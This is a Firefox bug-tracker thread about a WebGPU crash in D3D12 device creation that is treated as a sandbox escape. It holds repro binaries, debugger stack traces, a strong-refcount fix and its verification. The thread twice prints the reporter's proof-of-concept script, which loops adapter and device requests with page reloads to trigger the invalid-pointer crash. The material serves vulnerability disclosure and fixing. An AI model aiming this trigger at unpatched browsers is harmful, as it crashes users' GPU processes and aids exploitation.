- This bug might be related to a data race or thread safety condition of some kind in either D3D12 init., or how WGPU is using it. Looping initialization calls inside multiple threads, instead of only enumerating twice before exiting the process as in previous commentary, might reproduce the situation. This would be consistent with your statements that running tests repeatedly has been the most reliable way for you to reproduce these issues locally. I have attached the following (comments 20-22) to assist with trying this:
  - wgpu-3485-mvre-v2-loops-and-threads.zip: New source code based on comment 17's MVRE package. It is the code from which the other attachments are compiled, with the Rust 1.70.0 toolchain.
  - wgpu-3485-mvre-v2-loops-and-threads-debug.zip: debug build of the above.
  - wgpu-3485-mvre-v2-loops-and-threads-release.zip: same, but a release (optimized) build.
:loobenyang, could you please try reproducing this issue with one of the above binaries, or by compiling and running the above Rust source?
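A rough browser-side approximation of the "loops and threads" idea is to keep several adapter requests in flight at once, round after round. The sketch below is an assumption-laden analog, not a port of the attached Rust code: `stressAdapterRequests` is a hypothetical name, the `rounds` and `concurrency` defaults are arbitrary, and whether overlapping promises in a page actually translate into overlapping D3D12 initialization in the GPU process is not established anywhere in this bug.

```javascript
// Hypothetical stress helper. `gpu` is injected (navigator.gpu in a page) so
// the loop can also be exercised against a stand-in object.
async function stressAdapterRequests(gpu, { rounds = 10, concurrency = 8 } = {}) {
  let completed = 0;
  for (let round = 0; round < rounds; round++) {
    // Start `concurrency` requests before awaiting any of them, so they
    // overlap within the round.
    const pending = Array.from({ length: concurrency }, () => gpu.requestAdapter());
    const adapters = await Promise.all(pending);
    completed += adapters.length;
  }
  // Total number of adapter requests that settled successfully.
  return completed;
}

// In a page: stressAdapterRequests(navigator.gpu).then((n) => console.log(n));
```

If the GPU process crashes partway through, the pending promises may never settle or may reject, so a page using this would want its own timeout around the call.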
Assignee | ||
Comment 26•2 years ago
|
||
- One of the stack frames in the OP is named D3D12ValidateAndCreateDevice, which may imply a relationship to D3D12's validation layers. This might be important; validation layers are intended to change behavior for the sake of diagnostics, but they can also cause code that does not crash without them to crash while they are enabled.
To start with this thread of discussion: :loobenyang, do you have any system configuration that alters the set of validation layers enabled for D3D12?
Assignee | ||
Comment 28•2 years ago
|
||
Assignee | ||
Comment 29•2 years ago
|
||
In case it helps eventually: I have attached the contents of about:support's output on my primary Windows workstation as aboutSupport.pdf.zip.
Reporter | ||
Comment 30•2 years ago
|
||
(In reply to Erich Gubler [:ErichDonGubler] from comment #19)
:loobenyang: Just to make sure I understand, did you not try to compile and run the code I provided? Or are both results (running the old wgpu-test binary, running the code I provided) negative?
I did not compile the code. I ran the binary only.
Assignee | ||
Comment 31•2 years ago
|
||
Assignee | ||
Comment 32•2 years ago
|
||
Assignee | ||
Comment 33•2 years ago
|
||
(In reply to Looben Yang from comment #30)
(In reply to Erich Gubler [:ErichDonGubler] from comment #19)
:loobenyang: Just to make sure I understand, did you not try to compile and run the code I provided? Or are both results (running the old wgpu-test binary, running the code I provided) negative?
I did not compile the code. I ran the binary only.
Just so we can compare apples-to-apples with what Firefox is currently consuming, let's run the code that uses wgpu 0.16.0, like Firefox currently does. I've attached two ZIP archives containing compiled binaries of the source in wgpu-3485-mvre.zip with different optimization levels (wgpu-3485-mvre-debug.exe.zip and wgpu-3485-mvre-release.exe.zip). Could you please run them, and let me know what the result is?
BTW, I appreciate your patience. I know I'm asking you for a lot of bug repro attempts (and unfortunately, I don't see that changing soon). 😅 I wish that I had an environment in which I could reproduce this consistently, and attach a debugger.
Reporter | ||
Comment 35•2 years ago
|
||
(In reply to Erich Gubler [:ErichDonGubler] from comment #24)
- ASAN builds in Firefox might help us detect the same problem by (intentionally) crashing at an earlier point in execution. You can retrieve ASan-enabled 64-bit Windows builds of Firefox Desktop at http://archive.mozilla.org/pub/firefox/nightly/latest-mozilla-central/firefox-117.0a1.en-US.win64-asan-reporter.zip. :loobenyang, could you please try reproducing this in the latest nightly ASan reporter build?
I just tried, and I did reproduce it on the official Mozilla ASAN build. However, the ASAN build does not help much in this case, probably because the crash is not a direct corruption of ASAN-instrumented objects.
<script>
navigator.gpu.requestAdapter().then((adapter)=>{adapter.requestDevice().then((val)=>{ setTimeout(function(){location.reload();},200); });});
</script>
Firefox: 117.0a1 (2023-07-12) (64-bit)
OS: Windows 11 Enterprise 22H2 22621
(978.c80c): Access violation - code c0000005 (!!! second chance !!!)
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ffd`195b7d98 488b00 mov rax,qword ptr [rax] ds:00007ffd`c6945000=????????????????
3:081> k
Child-SP RetAddr Call Site
00 000000ba`45858f00 00007ffd`195c0d80 D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18
01 000000ba`45858f30 00007ffd`195c23d6 D3D12Core!D3D12CoreCreateDevice+0x30c
02 000000ba`45859150 00007ffd`c9416a4d D3D12Core!D3D12ValidateAndCreateDevice+0x146
03 000000ba`458591d0 00007ffd`c941668e d3d12!D3D12CreateDeviceImpl+0x5d
04 000000ba`45859220 00007ffc`ddb1ee84 d3d12!D3D12CreateDevice+0xae
05 (Inline Function) --------`-------- xul!wgpu_hal::dx12::instance::impl$1::enumerate_adapters::closure$0+0x174 [/builds/worker/checkouts/gecko/third_party/rust/wgpu-hal/src/dx12/instance.rs @ 113]
06 (Inline Function) --------`-------- xul!core::ops::function::impls::impl$3::call_mut+0x174 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\ops\function.rs @ 298]
07 (Inline Function) --------`-------- xul!core::iter::traits::iterator::Iterator::find_map::check::closure$0+0x174 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\traits\iterator.rs @ 2795]
08 (Inline Function) --------`-------- xul!core::iter::traits::iterator::Iterator::try_fold+0x19b [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\traits\iterator.rs @ 2299]
09 (Inline Function) --------`-------- xul!core::iter::traits::iterator::Iterator::find_map+0x19b [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\traits\iterator.rs @ 2801]
0a 000000ba`458592a0 00007ffc`ddb1eae4 xul!core::iter::adapters::filter_map::impl$2::next<wgpu_hal::ExposedAdapter<wgpu_hal::dx12::Api>,alloc::vec::into_iter::IntoIter<enum2$<d3d12::dxgi::DxgiAdapter>,alloc::alloc::Global>,wgpu_hal::dx12::instance::impl$1::enumerate_adapters::closure_env$0>+0x1c4 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\adapters\filter_map.rs @ 61]
0b (Inline Function) --------`-------- xul!alloc::vec::spec_from_iter_nested::impl$0::from_iter+0x5 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\alloc\src\vec\spec_from_iter_nested.rs @ 26]
0c (Inline Function) --------`-------- xul!alloc::vec::in_place_collect::impl$1::from_iter+0x33 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\alloc\src\vec\in_place_collect.rs @ 167]
0d (Inline Function) --------`-------- xul!alloc::vec::impl$15::from_iter+0x33 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\alloc\src\vec\mod.rs @ 2724]
0e (Inline Function) --------`-------- xul!core::iter::traits::iterator::Iterator::collect+0x33 [/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc\library\core\src\iter\traits\iterator.rs @ 1891]
0f 000000ba`458595e0 00007ffc`dd99a883 xul!wgpu_hal::dx12::instance::impl$1::enumerate_adapters+0x84 [/builds/worker/checkouts/gecko/third_party/rust/wgpu-hal/src/dx12/instance.rs @ 115]
10 000000ba`45859840 00007ffc`d381951f xul!wgpu_bindings::server::wgpu_server_instance_request_adapter+0x1213 [/builds/worker/checkouts/gecko/gfx/wgpu_bindings/src/server.rs @ 168]
11 000000ba`4585be70 00007ffc`d38444c1 xul!mozilla::webgpu::WebGPUParent::RecvInstanceRequestAdapter+0x2df [/builds/worker/checkouts/gecko/dom/webgpu/ipc/WebGPUParent.cpp @ 288]
12 000000ba`4585c310 00007ffc`cff52a3b xul!mozilla::webgpu::PWebGPUParent::OnMessageReceived+0x8461 [/builds/worker/workspace/obj-build/ipc/ipdl/PWebGPUParent.cpp @ 661]
13 000000ba`4585e720 00007ffc`ceb69800 xul!mozilla::gfx::PCanvasManagerParent::OnMessageReceived+0x6ab [/builds/worker/workspace/obj-build/ipc/ipdl/PCanvasManagerParent.cpp @ 214]
14 000000ba`4585e9f0 00007ffc`ceb670f2 xul!mozilla::ipc::MessageChannel::DispatchAsyncMessage+0x150 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1811]
15 000000ba`4585ea60 00007ffc`ceb67f8e xul!mozilla::ipc::MessageChannel::DispatchMessage+0x552 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1736]
16 000000ba`4585ec80 00007ffc`ceb686f2 xul!mozilla::ipc::MessageChannel::RunMessage+0x30e [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1536]
17 000000ba`4585ed50 00007ffc`cd499f20 xul!mozilla::ipc::MessageChannel::MessageTask::Run+0x172 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1643]
18 000000ba`4585edc0 00007ffc`cd4aa1e2 xul!nsThread::ProcessNextEvent+0x1450 [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1194]
19 000000ba`4585f380 00007ffc`ceb722fc xul!NS_ProcessNextEvent+0x172 [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 480]
1a 000000ba`4585f460 00007ffc`cea925b4 xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0x31c [/builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp @ 300]
1b (Inline Function) --------`-------- xul!MessageLoop::RunInternal+0x41 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 370]
1c 000000ba`4585f570 00007ffc`cea9237b xul!MessageLoop::RunHandler+0x94 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 364]
1d 000000ba`4585f5c0 00007ffc`cd49080f xul!MessageLoop::Run+0x1ab [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 345]
1e 000000ba`4585f6c0 00007ffc`fa0cada8 xul!nsThread::ThreadFunc+0x2ef [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 393]
1f 000000ba`4585fa40 00007ffc`fa0a389d nss3!_PR_NativeRunThread+0x438 [/builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c @ 399]
20 000000ba`4585fb80 00007ffd`d9c39363 nss3!pr_root+0x2d [/builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c @ 140]
21 000000ba`4585fbb0 00007ffc`fa4ab714 ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
22 000000ba`4585fbe0 00007ffd`dbb726ad clang_rt_asan_dynamic_x86_64!__asan::AsanThread::ThreadStart+0x84 [/builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_thread.cpp @ 277]
23 000000ba`4585fc30 00007ffd`22a445d4 KERNEL32!BaseThreadInitThunk+0x1d
24 (Inline Function) --------`-------- mozglue!mozilla::interceptor::FuncHook<mozilla::interceptor::WindowsDllInterceptor<mozilla::interceptor::VMSharingPolicyShared>,void (*)(int, void *, void *)>::operator()+0x19 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/nsWindowsDllInterceptor.h @ 150]
25 000000ba`4585fc60 00007ffd`dbfaa9f8 mozglue!patched_BaseThreadInitThunk+0x1f4 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/WindowsDllBlocklist.cpp @ 617]
26 000000ba`4585fd80 00000000`00000000 ntdll!RtlUserThreadStart+0x28
Reporter
Comment 36•2 years ago
(In reply to Erich Gubler [:ErichDonGubler] from comment #26)
- One of the stack frames in the OP is named `D3D12ValidateAndCreateDevice`, which may imply a relationship to D3D12's validation layers. This might be important; validation layers are intended to change behavior for the sake of diagnostics, but they can also change behavior such that behavior that does not crash without them may crash while they are enabled.
To start with this thread of discussion: :loobenyang, do you have any system configuration that alters the set of validation layers enabled for D3D12?
I don't have any special system configuration. I reproduced it on two different machines easily. So most likely it's NOT specific to one particular configuration.
Comment 37•2 years ago
ahale was able to repro: https://crash-stats.mozilla.org/report/index/09373667-be37-400a-b1c0-80c560230713
Comment 38•2 years ago
I was able to repro this crash on Firefox Nightly, attached the about:support.
Here's the crash I produced https://crash-stats.mozilla.org/report/index/09373667-be37-400a-b1c0-80c560230713
Comment 39•2 years ago
From what I've been able to determine, the browser has to be running, then you hibernate the computer (suspend, aka sleep), wake it up, and try loading the PoC; that triggers the crash. It doesn't seem to happen if an NVIDIA GPU is enabled, only with the Intel iGPU by itself.
Reporter
Comment 40•2 years ago
(In reply to Erich Gubler [:ErichDonGubler] from comment #33)
(In reply to Looben Yang from comment #30)
(In reply to Erich Gubler [:ErichDonGubler] from comment #19)
:loobenyang: Just to make sure I understand, did you not try to compile and run the code I provided? Or are both results (running the old `wgpu-test` binary, running the code I provided) negative?
I did not compile the code. I ran the binary only.
Just so we can compare apples-to-apples with what Firefox is currently consuming, let's run the code that uses `wgpu` 0.16.0, like Firefox currently does. I've attached two ZIP archives containing compiled binaries of the source in `wgpu-3485-mvre.zip` with different optimization levels (`wgpu-3485-mvre-debug.exe.zip` and `wgpu-3485-mvre-release.exe.zip`). Could you please run them, and let me know what the result is?
BTW, I appreciate your patience. I know I'm asking you for a lot of bug repro attempts (and unfortunately, I don't see that changing soon). 😅 I wish that I had an environment in which I could reproduce this consistently, and attach a debugger.
I ran both `wgpu-3485-mvre-release.exe` and `wgpu-3485-mvre-debug.exe.zip`. I also called these executables from a script continuously, but NO crash. The result of wgpu-3485-mvre-release:
Test A:
AdapterInfo {
name: "NVIDIA GeForce RTX 2060",
vendor: 0x10DE,
device: 0x1F15,
device_type: DiscreteGpu,
driver: "NVIDIA",
driver_info: "517.00",
backend: Vulkan,
}
AdapterInfo {
name: "Intel(R) UHD Graphics",
vendor: 0x8086,
device: 0x9BC4,
device_type: IntegratedGpu,
driver: "Intel Corporation",
driver_info: "Intel driver",
backend: Vulkan,
}
AdapterInfo {
name: "NVIDIA GeForce RTX 2060",
vendor: 0x10DE,
device: 0x1F15,
device_type: DiscreteGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Intel(R) UHD Graphics",
vendor: 0x8086,
device: 0x9BC4,
device_type: IntegratedGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Microsoft Basic Render Driver",
vendor: 0x1414,
device: 0x8C,
device_type: Cpu,
driver: "",
driver_info: "",
backend: Dx12,
}
Test B:
AdapterInfo {
name: "NVIDIA GeForce RTX 2060",
vendor: 0x10DE,
device: 0x1F15,
device_type: DiscreteGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Intel(R) UHD Graphics",
vendor: 0x8086,
device: 0x9BC4,
device_type: IntegratedGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Microsoft Basic Render Driver",
vendor: 0x1414,
device: 0x8C,
device_type: Cpu,
driver: "",
driver_info: "",
backend: Dx12,
}
Assignee
Comment 41•2 years ago
:loobenyang: I noticed that you haven't reported testing the `wgpu-3485-mvre-v2-loops-and-threads` binaries. Could you please test those, too?
Assignee
Comment 42•2 years ago
:loobenyang: After working with :ahale and :jrmuizel to analyze potential root causes in WGPU's D3D12 backend, we believe we may have a fix that addresses this issue. The fix enforces the use of strong reference counting for all APIs in the `d3d12` crate, which the `wgpu-core` crate consumes.
You may consume these tentative changes from CI builds that I made. :ahale has not been able to reproduce the issue on her machine(s) with this build, and we're cautiously optimistic that this might solve the issue in your environment as well:
- The set of CI jobs associated with my latest build can be found here: https://treeherder.mozilla.org/jobs?repo=try&revision=eff189309f751716a05773db8e54b03d4e001582&selectedTaskRun=VKMjiBlTR5CROokAfp2_bQ.0
- If you click on one of the build jobs (i.e., the jobs labeled with a green `B`), a bottom panel will show up with a tab called `Artifacts and Debugging Tools`. Once inside, you can download Firefox artifacts from them. In particular, you'll want the `target.zip` files, which contain `firefox.exe` and its dependencies.
- For convenience, here are the direct `target.zip` links: Windows 2012 x64 debug, Windows 2012 x64 opt.
Could you please run these locally, and let me know if this issue still reproduces?
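To illustrate the difference between weak and strong reference counting mentioned above, here is a minimal, self-contained sketch. It is not the code from the actual fix: `MockCom`, `WeakHandle`, and `StrongHandle` are hypothetical names that only model a COM-style reference count, on the assumption that the problem class is a copied handle outliving the object it points to.

```rust
use std::cell::Cell;
use std::rc::Rc;

// Hypothetical model of a COM object (a real one would be e.g. a D3D12 device).
// `ref_count` stands in for the count managed by AddRef/Release.
struct MockCom {
    ref_count: Cell<u32>,
}

impl MockCom {
    fn add_ref(&self) {
        self.ref_count.set(self.ref_count.get() + 1);
    }
    fn release(&self) {
        self.ref_count.set(self.ref_count.get() - 1);
    }
    // In real COM the object is destroyed when the count reaches zero.
    fn is_alive(&self) -> bool {
        self.ref_count.get() > 0
    }
}

// Weak style (hypothetical): copying the handle does not touch the count,
// so a copy can silently outlive the object.
#[derive(Clone)]
struct WeakHandle(Rc<MockCom>);

// Strong style (hypothetical): every copy takes a reference and every drop
// releases one, so the object lives as long as any handle does.
struct StrongHandle(Rc<MockCom>);

impl Clone for StrongHandle {
    fn clone(&self) -> Self {
        self.0.add_ref();
        StrongHandle(Rc::clone(&self.0))
    }
}

impl Drop for StrongHandle {
    fn drop(&mut self) {
        self.0.release();
    }
}

fn weak_copy_outlives_owner() -> bool {
    let obj = Rc::new(MockCom { ref_count: Cell::new(1) });
    let owner = WeakHandle(Rc::clone(&obj));
    let copy = owner.clone(); // no add_ref: count stays at 1
    owner.0.release(); // owner destroys the object: count drops to 0
    copy.0.is_alive() // the copy now refers to a destroyed object
}

fn strong_copy_outlives_owner() -> bool {
    let obj = Rc::new(MockCom { ref_count: Cell::new(1) });
    let owner = StrongHandle(Rc::clone(&obj));
    let copy = owner.clone(); // add_ref: count goes to 2
    drop(owner); // release: count goes back to 1
    copy.0.is_alive() // the copy still keeps the object alive
}

fn main() {
    println!("weak copy still valid: {}", weak_copy_outlives_owner());
    println!("strong copy still valid: {}", strong_copy_outlives_owner());
}
```

In this model the weak copy ends up pointing at a destroyed object while the strong copy does not. With a real COM object the weak case would mean reading through a stale vtable pointer, which would be consistent with the invalid function pointer read in the stack traces above, though that link is an inference rather than something this sketch demonstrates.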
Reporter
Comment 43•2 years ago
(In reply to Erich Gubler [:ErichDonGubler] from comment #41)
:loobenyang: I noticed that you haven't reported testing the `wgpu-3485-mvre-v2-loops-and-threads` binaries. Could you please test those, too?
I just ran these two and did not see anything interesting. The last few lines of output of wgpu-3485-mvre-v2-loops-and-threads-release:
Test A:
AdapterInfo {
name: "Intel(R) UHD Graphics 630",
vendor: 0x8086,
device: 0x3E9B,
device_type: IntegratedGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Microsoft Basic Render Driver",
vendor: 0x1414,
device: 0x8C,
device_type: Cpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Intel(R) UHD Graphics 630",
vendor: 0x8086,
device: 0x3E9B,
device_type: IntegratedGpu,
driver: "",
driver_info: "",
backend: Dx12,
}
AdapterInfo {
name: "Microsoft Basic Render Driver",
vendor: 0x1414,
device: 0x8C,
device_type: Cpu,
driver: "",
driver_info: "",
backend: Dx12,
}
Test A:
Test A:
Test A:
AdapterInfo {
name: "Microsoft Basic Render Driver",
vendor: 0x1414,
device: 0x8C,
device_type: Cpu,
driver: "",
driver_info: "",
backend: Dx12,
}
Test A:
Test A:
Test B:
Reporter
Comment 44•2 years ago
(In reply to Erich Gubler [:ErichDonGubler] from comment #42)
:loobenyang: After working with :ahale and :jrmuizel to analyze potential root causes in WGPU's D3D12 backend, we believe we may have a fix that addresses this issue. The fix enforces the use of strong reference counting for all APIs in the `d3d12` crate, which the `wgpu-core` crate consumes.
You may consume these tentative changes from CI builds that I made. :ahale has not been able to reproduce the issue on her machine(s) with this build, and we're cautiously optimistic that this might solve the issue in your environment as well:
- The set of CI jobs associated with my latest build can be found here: https://treeherder.mozilla.org/jobs?repo=try&revision=eff189309f751716a05773db8e54b03d4e001582&selectedTaskRun=VKMjiBlTR5CROokAfp2_bQ.0
- If you click on one of the build jobs (i.e., the jobs labeled with a green `B`), a bottom panel will show up with a tab called `Artifacts and Debugging Tools`. Once inside, you can download Firefox artifacts from them. In particular, you'll want the `target.zip` files, which contain `firefox.exe` and its dependencies.
- For convenience, here are the direct `target.zip` links: Windows 2012 x64 debug, Windows 2012 x64 opt.
Could you please run these locally, and let me know if this issue still reproduces?
I tried several times, but I could not reproduce it.
I ran the same test case InvalidFunPointer_wgpu_hal_PoC_adapter.html on the same machine. The result with this patched build and the official nightly build is:
official nightly - Reproduced
patched release - NOT reproduced
official nightly - Reproduced
patched release - NOT reproduced
official nightly - Reproduced
patched release - NOT reproduced
Assignee
Comment 45•2 years ago
:loobenyang: Excellent! I'll prepare a patch to consume the changes more formally. We have an open upstream PR for the strong ref. changes at wgpu#3936 now, and we expect that to be merged soon. Once that's happened, my patch will be ready to land.
Comment 46•2 years ago
wgpu#3936 is now merged into wgpu trunk. I've also backported it to the wgpu commit we are currently using in Mozilla Central; that backport is available as the branch `use-d3d12-0.7.0` in `github.com/gfx-rs/wgpu`.
If we can land Bug 1844012 quickly, then doing another import of commit 1161a22f from `gfx-rs/wgpu` trunk is the way forward.
If Bug 1844012 does not land quickly, then we should do an import of the branch `use-d3d12-0.7.0` from `gfx-rs/wgpu`, which rebases our fix directly on the wgpu commit Mozilla Central is using now.
Assignee
Comment 47•2 years ago
Bug 1844012 has had its scope changed to include consuming wgpu#3936. It's now up for review at D183959, which I've approved (CC :nical). :nical has indicated that he intends to land at latest by tomorrow, waiting only for review from `#supply-chain-reviewers` on D183958. If it is not reviewed by then, the current plan is to just land it anyway, since this is a high priority.
Assignee
Comment 48•2 years ago
Bug 1844012's patches to use strong refcounting in `wgpu-core`'s D3D12 backend have landed! :loobenyang: Unless you can reproduce this issue in the latest Firefox Nightly, I believe we may now consider this issue closed. Please confirm, so that we may mark this bug as `Resolved`.
Reporter
Comment 49•2 years ago
(In reply to Erich Gubler [:ErichDonGubler] from comment #48)
Bug 1844012's patches to use strong refcounting in `wgpu-core`'s D3D12 backend have landed! :loobenyang: Unless you can reproduce this issue in the latest Firefox Nightly, I believe we may now consider this issue closed. Please confirm, so that we may mark this bug as `Resolved`.
I just did a comparison test again. I could not reproduce it on the latest nightly.
First, I disabled my WIFI, and ran InvalidFunPointer_wgpu_hal_PoC.html on my existing nightly build. It reproduced easily:
<script>
navigator.gpu.requestAdapter().then((adapter)=>{adapter.requestDevice().then((val)=>{ setTimeout(function(){location.reload();},200); });});
</script>
117.0a1 (2023-07-18) (64-bit)
OS Windows 11 Home 22H2 (Build 22621.1992)
(41c4.3f14): Access violation - code c0000005 (!!! second chance !!!)
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff9`96317d98 488b00 mov rax,qword ptr [rax] ds:00007ff9`e2ad5000=????????????????
0:095> r
rax=00007ff9e2ad5000 rbx=000000000000fad7 rcx=000001d3bc650e40
rdx=00000075abcacf20 rsi=000001d3bc651410 rdi=0000000000000000
rip=00007ff996317d98 rsp=00000075abcacb20 rbp=00000075abcacdd0
r8=00000075abcad060 r9=0000000000000018 r10=dee01e7974d59970
r11=8882222222220020 r12=0000000000000001 r13=00007ff9fe295108
r14=00000075abcad060 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200
D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18:
00007ff9`96317d98 488b00 mov rax,qword ptr [rax] ds:00007ff9`e2ad5000=????????????????
0:095> k
Child-SP RetAddr Call Site
00 00000075`abcacb20 00007ff9`96320d80 D3D12Core!CLayeredObject<CDevice>::CContainedObject::QueryInterface+0x18
01 00000075`abcacb50 00007ff9`963223d6 D3D12Core!D3D12CoreCreateDevice+0x30c
02 00000075`abcacd70 00007ff9`fe286a4d D3D12Core!D3D12ValidateAndCreateDevice+0x146
03 00000075`abcacdf0 00007ff9`fe28668e d3d12!D3D12CreateDeviceImpl+0x5d
04 00000075`abcace40 00007ff9`9f019e5b d3d12!D3D12CreateDevice+0xae
05 00000075`abcacec0 00007ff9`9f04e0e0 xul!JOG_RegisterPing+0xa3badb
06 00000075`abcad270 00007ff9`9ebbdb18 xul!JOG_RegisterPing+0xa6fd60
07 00000075`abcad4f0 00007ff9`9cf9575e xul!JOG_RegisterPing+0x5df798
08 00000075`abcaeca0 00007ff9`9cf9470c xul!VR_RuntimePath+0xa8357e
09 00000075`abcaef90 00007ff9`9c4eb0bf xul!VR_RuntimePath+0xa8252c
0a 00000075`abcaf140 00007ff9`9b551e79 xul!mozilla_dump_image+0xddcf
0b 00000075`abcaf1e0 00007ff9`9b2182af xul!GIFFT_TimingDistributionCancel+0x8f7c89
0c 00000075`abcaf550 00007ff9`9b21587e xul!GIFFT_TimingDistributionCancel+0x5be0bf
0d 00000075`abcafa30 00007ff9`9a22fc8f xul!GIFFT_TimingDistributionCancel+0x5bb68e
0e 00000075`abcafae0 00007ff9`9a0587fb xul!XRE_GetBootstrap+0x9ddc5f
0f 00000075`abcafb30 00007ff9`a16b5885 xul!XRE_GetBootstrap+0x8067cb
10 00000075`abcafd10 00007ff9`a1738b81 nss3!sqlite3_result_text+0xc55
11 00000075`abcafd90 00007ffa`13119363 nss3!PR_MD_NOTIFY_CV+0xc1
12 00000075`abcafdc0 00007ffa`142726ad ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
13 00000075`abcafdf0 00007ff9`d5606218 KERNEL32!BaseThreadInitThunk+0x1d
14 00000075`abcafe20 00007ffa`1562aa68 mozglue!mozilla::mscom::detail::EndProcessRuntimeInit+0x318
15 00000075`abcafe90 00000000`00000000 ntdll!RtlUserThreadStart+0x28
I reproduced it about 3 times, then switched WIFI back on. My nightly got updated to 117.0a1 (2023-07-20) (64-bit). I could NOT reproduce it anymore with the same test case InvalidFunPointer_wgpu_hal_PoC.html.
Comment 50•2 years ago
(this was confirmed by ahale)
Comment 51•2 years ago
Since this was not in a shipping version of Firefox, it would be awkward to issue a Firefox advisory for it, but we should give it a CVE and issue an advisory through the wgpu GitHub advisories.
Comment 52•2 years ago
Looben: Thank you for your help and persistence with this bug. Since the GPU process is not sandboxed currently, this find counts as a Firefox sandbox escape. We're very grateful to be able to fix it before this was enabled for our users.
Erich: thank you, too, for your persistence in this bug that was hard to narrow down.